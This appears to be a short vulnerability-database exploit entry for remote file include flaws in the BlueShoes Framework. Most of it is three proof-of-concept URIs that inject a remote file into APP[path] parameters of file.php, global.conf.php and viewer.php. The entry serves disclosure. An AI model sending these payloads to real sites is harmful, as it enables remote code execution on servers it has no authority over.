• info
• discussion
• exploit
• solution
• references

BlueShoes Framework Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/applications/flemanager/file.php?APP[path][core]=$h£ll.txt?
http://www.example.com/[path]/applications/flemanager/global.conf.php?APP[path][bsRoot]=$h£ll.txt?
http://www.example.com/[path]/applications/flemanager/viewer.php?APP[path][bsRoot]=$h£ll.txt?

• /data/vulnerabilities/exploits/blueshoes_poc.txt